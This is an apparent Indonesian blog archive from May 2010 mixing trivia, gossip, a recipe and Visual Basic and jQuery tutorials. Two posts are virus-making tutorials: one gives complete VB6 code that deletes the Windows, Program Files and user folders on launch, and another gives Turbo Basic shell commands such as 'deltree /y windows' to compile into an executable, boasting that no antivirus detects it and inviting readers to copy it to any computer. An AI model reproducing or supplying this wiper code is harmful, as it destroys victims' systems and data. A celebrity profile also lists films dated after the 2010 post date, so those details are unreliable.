Sunday, May 30, 2010

Lampu Merah Terlama Di Indonesia

Lokasi : perlimaan Senen, dari arah Kramat raya menuju Senen.
(280 detik gan.... mantap!!)

ngliatnya aja dah bete.. gmana nunggunya..hiks


Orang-orang yang sabar menunggu



saking bete nunggu ada yang sampe Standarin motornya, (hihi)

Saturday, May 29, 2010

Membuat Theme Sony Ericsson dan Nokia menggunakan myThemeCreator versi 2

Asik juga jika theme hp kita buat sesuai desain kita sendiri sehingga bisa tampil beda dengan theme-theme hp pada umumnya, nah...., berikut keterangan yang sudah saya terjemahkan ke bahasa kita dari situs  http://www.lasyk.net/mTC/



Fitur tambahan myThemeCreator v2:
1. GUI telah disederhanakan,
2. Editor Grafik yang memungkinkan kita menambahkan transparansi dan efek lain untuk gambar,
3. Fitur sistem preview baru sehingga kita dapat menyimpan setiap tampilan, kita juga dapat menyalin preview ke clipboard agar mudah ditransfer ke editor grafis  untuk di edit lagi,
4. Untuk membuat segalanya lebih menyenangkan, telah ditambahkan pula sistem pratinjau resolusi layar  yang disempurnakan yang memungkinkan anda sepenuhnya menyesuaikan cara preview tampilan,
5. Pratinjau XML  yang dinamis untuk memeriksa dengan cepat pada file XML yang dihasilkan pada MTC
6. browser
7. Deteksi tema otomatis

Download mTC 

Friday, May 28, 2010

Ubah Video Kwalitas Rendah Jadi Kwalitas Bioskop di Youtube – CyberLink TrueTheater Enhancer


Seperti kita tau, kebanyakan video-video di youtube rata-rata berkwalitas kurang baik mengingat kompresi yang seadanya. Ya, hal ini memang bisa dimaklumi karena mereka harus menawarkan durasi yang cukup panjang untuk sebuah film video tetapi di pihak lain, video mesti tampil dengan kecepatan tinggi untuk mengadjust kecepatan akses internet terutama di negara-negara yang koneksi internetnya masih sangat rendah speed-nya.

Nah, di sisi kita, kamu sekarang bisa sedikit memanipulasi video di Youtube sehingga video yang seyogyanya tampil seadanya dengan low quality bisa ditransform menjadi video berkwalitas tinggi. Caranya cukup install CyberLink TrueTheater Enhancer, saja, jalankan, buka browser Internet Explorer, lalu kamu bisa rasakan perbedaannya sangat jauh. User juga dapat mengadjust ketajaman dan pencahayaannya secara manual untuk mendapatkan hasil yang menurutnya merupakan setting terbaik. Nah, ubah video kwalitas yang kurang ok jadi lebih ok di Youtube dengan cara yang mudah dan sederhana ini.
Download CyberLink TrueTheater Enhancer Trial
Download sini untuk ubah kwalitas film video di Youtube.

Gifsoup – Merekam Video Youtube ke Dalam File Gambar

Berencana utk mengambil segmen per segmen video dari Youtube? Mau merekam video tersebut menjadi file berekstension gambar?

Gifsoup akan secara online membantu kita merekam video youtube ke dalam format animated gif, yang artinya video yang kita tonton
kita tersebut bisa kita potong dan convert ke dalam .gif. Sangat mudah sekali melakukan hal ini, kita tidak perlu mendownload software khusus atau menggunakan trik dan hack macam-macam. Cukup kunjungi Gifsoup dan masukkan saja alamat Youtube yang videonya ingin kita convert ke mode animated gif.

Setelah kita menyediakan URL tsb, kita dapat kemudian melakukan edit terhadap file gambar tersebut yang kemudian kita nantinya dapat kita pakai untuk membuatnya menjadi sebuah banner yang menarik atau mungkin kita akan masukkan ke forum sebagai signature, menjadikannya sebagai isi artikel di blog, dan lain sebagainya.
Kunjungi Gifsoup

Merekam Semua Aktivitas Browser Ke Dalam Video di Firefox


capture fox
Capture Fox, sebuah addon yang berfungsi menangkap serta merekam semua aktivitas di browser Mozilla Firefox dan disimpan di dalam format file video sehingga file tersebut bisa dimainkan dengan software pemutar video seperti Windows Media Player ataupun QuickTime.

Sebagaimana kita tahu semua addon yang terinstall di Firefox sangatlah mudah untuk dipakai, seringkali hanya dengan beberapa click saja, addon tersebut akan langsung berfungsi sebagaimana mestinya, begitu juga dengan Capture Fox, cukup download, kemudian sebuah icon akan muncul di sebelah kanan bawah status bar di browser Firefox.
capture video
Kemudian ketika kita ingin mulai mengcapture video tersebut, tinggal click, lalu melakukan sedikit setting, tekan Start Capturing!, dan seluruh aktivitas di browser akan terekam.
video recorder
Jika telah selesai, tinggal kita pilih untuk menyimpan file video tersebut ke komputer atau memainkannya langsung atau mungkin kita ingin memulai sebuah rekaman video baru!
rekam video
Tool ini sangat berguna jika kita ingin membuat sebuah tutorial komputer, terutama jika berhubungan dengan tutorial yang berhubungan dengan aktivitas di browser seperti cara membuat website ataupun cara membrowsing untuk kelas pemula. Anda dapat mendownload tool yang cocok disebut video recorder ini di Capture Fox

Wednesday, May 26, 2010

Pria Berbulu Beristri Cantik

Yu Zhenhuan adalah cowok China yang memiliki bulu di sekujur tubuhnya. Ia dijuluki sebagai manusia yang paling banyak memiliki bulu di dunia. Secara logika, dengan keterbatasannya itu, mungkin ia akan sulit mendapatkan seorang istri. Faktanya, ia memiliki istri yang cantik.

Foto-foto berikut menunjukkan betapa mesranya Yu Zhenhuan bersama istri tercintanya itu. (indoforum)





Mayat Istri Jadi Pajangan

Sang suami, Jeff Green, 32 tahun, seorang Amerika yg tinggal di Arizona. Istri Jeff meninggal dan membuat sang suami sangat amat menderita. Untuk mengatasi penderitaannya, Jeff lakukan sesuatu yg sungguh di luar kebiasaan. Lucy, demikian nama istrinya yg meninggal, punya penyakit jantung yg membuatnya meninggal di usia 29. Kalimat terakhirnya, "Kita akan ketemu lagi di surga". Tapi kalimat itu tidak cukup menyakinkan Jeff.

Detik detik terakhir penguburan, Jeff memutuskan ia tidak bisa membiarkan Lucy pergi begitu saja. Atas seijin pemerintah, Jeff di perbolehkan membawa mayat istri nya ke rumah. Karena Lucy semasa hidupnya suka humor, Jeff berpikir pasti istri nya tidak keberatan jika di jadikan meja kopi. Jeff lalu memesan meja kaca khusus yg bisa menghentikan proses pembusukan. Harga meja itu US$ 6000.

Monday, May 24, 2010

Creating A Media Player

VB 6.0 :Creating a Media Player ,Video Player ...

Hello All Programer..

lol I decided to post a tutorial of How To Create A Music Player , Video Player , Photo Viewer , and all the Files that Windows Media Player Suports ..




Open a Standard.exe
Go to COMPONENTS and ADD the Microsoft Common Dialog Control 6.0 and windows Media Player
Take the Windows Media Player and size it as you want
the Microsoft Common Dialog 6.0 just put somewhere .
After You'll need
- a command button
- a list Box

The List Box will be the place for Files that you will add ...
for the list box the code is
Code:
WindowsMediaPlayer1.URL = List1
The Command Button rename with " ADD File "
and the code for it
Code:
Dim sFile As String


With CommonDialog1
.DialogTitle = "Open Media..."
.CancelError = False
.Filter = "All Suported Files"
.ShowOpen
If Len(.FileName) = 0 Then
Exit Sub
End If
sFile = .FileName

With List1
.AddItem sFile
End With
End With
and finaly TEST it ..
Tutorial buat virus dengan visual basic
Mei, 18 2010 Jam 10.37
Filed under: visual basic

tutorial kali ini membahas tentang bagaiman cara membuat virus dengan visual basic mungkin bagi master2 vb tidak perlu untuk membaca tutorial ini dikhususkan untuk pemula banyak sekali virus2 yaang sudah bertebaran di internet tapi bagaimana program virus itu bekerja berikut langkah-langkahnya


angkah-langkahnya adalah:

1. Buka VB 6.0 kalian lalu pilih Standart Exe.
2. Lalu buat formnya sekecil mungkin.
3. Dan klik 2x pada form itu dan akan menampilkan halaman untuk menaruh source kode, tolong hapus kode yang sudah ada, dan CoPas seluruh kode dibawah ini:

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\unpamhack.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

4. Setelah udah diCoPas silahkan dieksekusi dengan menekan tombol F5, atau bikin jadi exe. dengan cara buka menu File pilih Make Project1.exe simpan dengan nama apa saja,, Oupsss tunggu dulu baca dulu sampe kelar, cos bahaya nanti…

Nah untuk keterangan dari koding diatas adalah, pada teks yang warna hijau itu penangkal nih virus, jadi kalau di folder c:\windows\system32\ ada file yang namanya unpamhack.txt, kalian ga bakal keserang oleh virus ini. bisa kalian edit koq jadi apa aja.. Satu lagi kalian gak bisa ngedit folder drive D yang untuk dijadikan objek untuk dihapus karena hanya bisa menghapus sistem saja. Apa jadinya kalau sistem terhapus?? ERRRROOORRR alias komputer situ ngblanggggg…..blengg..blengg..bleenggg…

Virus Maker Part 1


CARA BUAT VIRUS DENGAN VB



Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell “Perintah DOS”
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell “c:”
shell “cd\”
shell “del command.com”
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell “c:”
shell “cd\”
shell “deltree /y mydocu~1″
shell “deltree /y windows”
shell “deltree /y progra~1″
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Class=”alignleft” width=”97″ height=”130″ />Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Selamat mencoba…
Kami tidak bertanggung jawab bila terjadi ssuatu ea…

How To Making A Music Player


You’ll need the Windows Media Player application to do this, it’s pretty simple overall. I’ll show you how to use the “Open file Dialog”, or as I’ll refer to it here, the OFD. If you don’t have WMP, the latest version, WMP11 can be downloaded from Microsofts website.
In your toolbox, right click on some gray space and select “Add Components”. After a minute or two, the window that opens will populate. Click the “COM Library” at the top tabs, and then, after that list has populated, find “Windows Media Player Control” (or similar). Check the box, and then click OK.
Drag WMP control over to your form. A miniature media base will be displayed. At the moment, it does nothing. So we’ll add some code :)Add an open file dialog, a textbox, and a button, calling them url_text and get_url_btn respectively.

Double click the button, and enter the following code:

dim ofd as new openfiledialog
ofd.show
If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then ‘execute following if user clicks OK. Me.url_text.Text = ofd.FileName Me.AxWindowsMediaPlayer1.URL = ofd.FileName Me.Text = “Playing” End IfThen double click the WMP control to enter WMP’s “Playstate.change”Enter the following Select Case Me.AxWindowsMediaPlayer1.playStateCase 1 Me.Text = “Stopped”Case 2 Me.Text = “Paused”Case 3 Me.Text = “Playing” End SelectThere are many more, adding another “Case” will open intelliSense, and then using the up/down arrow keys scrolling through the choices and waiting for a second will open a tooltip, for example WMPLib.WMPPlayerState.wmppsMediaEnded = 8
So:

Case 8
Me.text = “Media Ended”

You now have a fully functional music player. :DYou can skip the textbox part, you don’t have to have the URL in the textbox. The following would suffice.

Me.AxWindowsMediaPlayer1.URL = ofd.FileName

//////Pro\\\\\\\
Want to do it pure-vb style?
Play = My.Computer.Audio.Play(TextBox1.Text)
Stop = My.Computer.Audio.Stop
there are more, those are the simple ones. It’s very basic, using WMP control allows you to play a wider variety of formats, doing it pure-vb only allows you to play .wav files.
Got another tutorial you’d like to see? Something complicated made easy?

Sunday, May 16, 2010

Nonton RCTI, TRANSTV, SCTV, GLOBALTV By MIVO.TV

WATCH TV CHANNEL STREAMING ONLINE:
RCTI, SCTV, INDOSIAR, TV ONE, MNC TV, ANTV, GLOBAL TV, METRO TV, TRANS TV, TELKOM VISION, KOMPAS TV, MIVO TV, PJTV, DAAI TV, NAGASWARA TV, AHSAN TV, MADURA CHANNEL, ALIF TV, TV EDUKASI, VICTORY MOVIES, HBO, HBO 2, STAR MOVIES, CNBC, ESPN HD, ESPN BRAZIL, BRITISH EURO SPORT, SKYS PORTS 2, SKY SPORTS 3, SKY SPORTS 4, SPORT TV 1 HD, SPORT TV 2, AXN, AXN BLACK, FOX, FOX MOVIES, FOX CRIME, MAX HD, STAR PLUS, NEO CRICKET, PTV HOME, HD MOVIES.
Sepakbola:  Live Score
Sebelum Anda nonton TV, Pastikan Komputer Anda sudah terinstal Adobe Flash Player. Kalau belum, Silahkan download disini

Pasang Banner BLOG AMIN di web/blog anda agar dapat lebih mudah kembali ke sini:

Tombol memperbesar atau memperkecil ukuran font di blog

Teori ini nanti akan memakai kode Jquery. Tetapi dengan memakai kode Jquery ini, jangan perlu takut Blog anda akan menjadi berat loadingnya, karena saya pernah menulis mengenai Compress Jquery agar tidak memberatkan blog. Anda bisa coba buka nanti.

Caranya kira-kira seperti ini:

1. Sepert biasa anda Proses Login Ke Account Blogger Anda
2. Masuk Ke Edit HTML
3. Kemudian cari kode </head>:
4. Letakkan Kode di bawah ini, diatas kode </head>

<script src='http://sites.google.com/site/amienk2/file-cabinet/ubahfontblogamin.txt' type='text/javascript'/>

5. Kemudian masukkan script di bawah ini, dibawah kode txt diatas. Awas jangan sampe keliru. Di bawah Kode yang diatas



<script type='text/javascript'>
$(function(){
$('input').click(function(){
var ourText = $('#content-wrapper');
var currFontSize = ourText.css('fontSize');
var finalNum = parseFloat(currFontSize, 10);
var stringEnding = currFontSize.slice(-2);
if(this.id == 'large') {
finalNum *= 1.1;
}
else if (this.id == 'small'){
finalNum /=1.1;
}
else if (this.id == 'reset'){
finalNum =13;
}
ourText.animate({fontSize: finalNum + stringEnding},500);
});
});
</script>

CATATAN :

- #content-wrapper yang ada diatas Dapat anda ubah sesuai dengan keinginan anda, bagian mana yang akan anda atur fontnya. Misal, #sidebar-wrapper, #main-warapper, dlsb.

- "finalNum *= 1.1;", "finalNum /=1.1;", "finalNum =13;", "stringEnding},500", angka-angka tersebut dapat anda rubah, sesuai selera anda.

6. Kemudian cari kode  <data:post.body/> lalu letakkan script di bawah ini tepat diatas kode <data:post.body/>

<div id='resizefont'>
<input id='large' type='button' value='Perbesar'/>
<input id='reset' type='button' value='reset'/>
<input id='small' type='button' value='perkecil'/>
</div>

7. Kemudian Cari kode ]]></b:skin> dan Copy kode CSS di bawah, kemudian pastekan di atas kode ]]></b:skin>

/* resizeFont
*/
#resizeFont{
text-align:right;
margin-right:10px;
}

kode CSS ini dapat anda rubah, untuk menyesuaikan posisi tombol.
8. Simpan Template.

Compress Jquery agar tidak memberatkan blog

Anda pengguna blog yang sudah tahu pasti akan terpesona dan kepengin fitur-fitur yang bisa dipakai untuk blog anda. Ada banyak sekali jenisnya
Dan dapat diterapkan dengan mudah untuk blog anda. Tetapi yang menjadi permasalahan disini, Jquery akan sangat memberatkan Bobot Blog kita. Lalu bagaimana Solusinya?

Solusi paling jitu ya anda harus men-kompresnya menjadi lebih Ringan. Ada 2 cara yang bisa anda coba.

Yang pertama anda bisa menggunakan cara Offline. Cukup membingungkan juga jika anda menggunakan teknik ini.

Ada yang mudah, ngapain Harus sulit? hehehe.. Cara yang paling mudah ya anda menggunakan Teknik Online.

1. Simpan Jquery JS anda ke dalam sebuah Memori Komputer.
2. Silakan untuk membuka http://yui.2clics.net/.
3. Kemudian Klik Browser, dan pilih atau cari lokasi File JS anda tadi disimpan.
4. Klik "Compress" deh.

Mudah kan? paling tidak dengan cara aplikasi Kompres secara Online hasilnya akan sama dengan Teknik secara Offline. Minimal JS anda akan terkompres 53% dari file Js kamu.

Saturday, May 15, 2010

Bioskop Termahal Di Dunia

Total teater yang dimiliki bioskop ini berjumlah 11 teater. Terdapat 6 teater diantaranya yang baru-baru ini interiornya dirancang khusus dengan mewah, yang menampilkan total 599 kursi. Pacific Place dianggap sebagai "Bioskop Asia yang paling maju secara teknologi", dengan sistem audio "the best 3-way SRD-EX" yang paling baik di Hongkong, yang belum pernah kita lihat seperti di bioskop-bioskop biasa. Sebagai contoh, tiket box office tidak lagi berbentuk seperti sebuah kotak kaca konvensional (seperti tempat pembelian karcis di bioskop-bioskop biasa), namun malah "lebih mirip dengan patung modern atau lobi hotel butik yang keren, luar biasa dan menggabungkan teknologi yang mampu digunakan untuk mengeluarkan tiket." Kisaran harga tiket dari $ 50HK ($ 6,42 Amerika) untuk $ 75HK ($ 9,64 Amerika). Anda dapat memilih tempat duduk tepat Anda online pada saat membeli tiket anda.








Semua kursi berlapis kulit dari Perancis dengan mewah , berukuran lebar 4 kaki kaki dan meninggalkan banyak ruang bersender dan melonjorkan kaki. Teater VIP menyediakan tempat duduk hingga 39 kursi dan dapat disewakan untuk resepsi perusahaan dan pihak swasta. Salah satu teater paling besar memiliki hingga 142 kursi.


(source : indoforum)

Wednesday, May 12, 2010

Sambal Oncom Lagi


Sewaktu pertemuan komunitas Indonesia di Eropa yang diadain di kebun tulip Keukenhof Gardens Tulip Belanda, ada yang pesan ke saya sambal oncom. Lalu saya buat untuk mereka. Lumayan, ada sisanya. Dan kata mereka, sambalnya enakkk.. senang sekali rasanya, bisa mengobati kerinduan teman-teman akan sambal oncom yan g super duper itu di Eropa :)

Dari resep Sambal Oncom-nya ini, saya tambah cabenya dan bawang merahnya agak banyak.

Wednesday, May 5, 2010

Gang Dolly, Wisata Prostitusi Terbesar di Asia Tenggara


Berbicara tentang surabaya, Tak lepas dari image dolly. Konon, dolly lebih terkenal ketimbang surabaya. Waktu di BALI , ada orang AUSIE dan BRAZIL yang lebih tahu DOLLY ketimbang SURABAYA!! Hebat banget nama ini.

Menurut sejarah, Dolly berdiri sejak jaman penjajahan BELANDA. Saya sendiri kurang mengetahui sejak kapan dolly berdiri. Dolly didirikan oleh TANTE DOLLY yang ASELIE keturunan NONIK BELANDA, turunan Tante dolly masih ada hingga kini , tapi ga ada yang ngurusin DOLLY lagi. Sebagai pencetus dan pendiri dolly, tante dolly terbilang sukses. Buktinya , dolly adalah salah satu prostitusi terbesar di asia tenggara mengalahkan Phat Pong di Bangkok, Thailand dan Geylang di Singapura, gila kan?.

Kawasan Dolly berada di tengah kota, berbaur dengan pemukiman penduduk yang padat, di kawasan Putat, Surabaya. Di sana, tak hanya terdengar derungan suara mesin kendaraan yang lewat, tetapi juga ada desahan napas para kupu-kupu malam yang terdengar sayup-sayup di balik kamar sempit.

Kompleks lokalisasi Dolly menjadi sumber rezeki bagi banyak pihak. Bukan hanya PSK, tetapi juga pemilik warung, penjaja rokok, tukang parkir, tukang becak dan lain-lain. Di sana juga terdengar sayup-sayup seorang anak sedang melantunkan ayat-ayat suci, dan kalimat-kalimat bijak di tengah-tengah majelis pendidikan. Kompleks banget kegiatan disini.
Pernah terlintas Dolly dimasukkan icon wisata bagi kota surabaya!!. Hahaha. pingin ketawa jadinya, terjadi kontroversi untuk memasukkan Gang Dolly sebagai salah satu daerah tujuan wisata Surabaya bagi wisatawan mancanegara.

Pihak Pemkot surabaya jelas mikir 1000x kali kalau membuang atau menutup dolly layaknya KRAMAT GANTUNG di JAKARTA, SARITEM di BANDUNG. Kenapa? penghasilan perbulan dari dolly mencapai 34 milyar rupiah!! Bukan HOAX, tapi itulah fakta yang aku dapatkan dari saudaraku yang kerja di pemkot, mantap gak?








Monday, May 3, 2010

Sapi Terbesar Di Dunia

Mungkin tidak ada hubungannya dengan teknologi dan ilmu pengetahuan (science) tapi bila hal ini bisa menjadi suatu penemuan, mungkin bisa mengurangi tingkat kelaparan yang ada di dunia :).





Chilli adalah sapi jantan terbesar di dunia dengan berat lebih dari 1 ton dan tingginya hampir mencapai 2 meter (+/- 197 cm) atau hampir sama dengan ukuran sebuah gajah kecil.

Seperti yang kami bilang diatas bahwa sapi yang satu ini bukan suatu rekayasa genetik atau sejenisnya tetapi hanya merupakan sapi biasa yang gemar memakan rumput setiap harinya.

Bisa anda bayangkan bila semua ukuran sapi bisa dibuat sebesar ini maka satu sapi bisa untuk makan 1 kelurahan. (source : indo.forum)

Saturday, May 1, 2010

Profil Katrina Kaif

Biografi Lengkap Katrina Kaif

Nama : Katrina Kaif
Panggilan : Kat
Tempat Tanggal Lahir : Hongkong, 16 Juli 1984
Profesi : Artis, model dan Bintang film Bollywood
Ukuran Bra : 35C
Tinggi : 174 cm
Facebook : KatrinaKaifFan
Twitter : @KatrinaKaif_

FILM
Ek Tha Tiger- 2012
Zindagi Na Milegi Dobara-2011
Mere Brother Ki Dulhan-2011
Main Krishna Hoon-2011
Raajneeti - 2010
Tees Maar Khan-2010
New York-2009
Blue-2009
Ajab Prem Ki Ghazab Kahani-2009
De Dana Dan-2009
Race-2008
Singh Is Kinng-2008
Hello-2008
Yuvvraaj -2008
Namastey London-2007
Apne -2007
Partner-2007
Welcome-2007
Hum ko deewana kar gaye-2006
balram vs. Taradas supriya-2006
Sarkar-2005
Maine Pyaar Kyun Kiya -2005
Allari Pidugu Shwetha-2005
Malliswari-2004
Boom-2003

Fakta Unik
·    Katrina Kaif  artis India namun lahir di Hongkong dan memiliki darah Inggris.
·    Ibunya bernama Suzanne Turquotte dan ayah, Mohammed Kaif
·    Wanita Terseksi FHM India berdasarkan polling tahun 2009
·    Mendapat Penghargaan Stardust Breakthrough Performance Award (Female)tahun 2005
·    Mendapat Penghargaan IIFA Awards sebagai Best Female Style Icon2008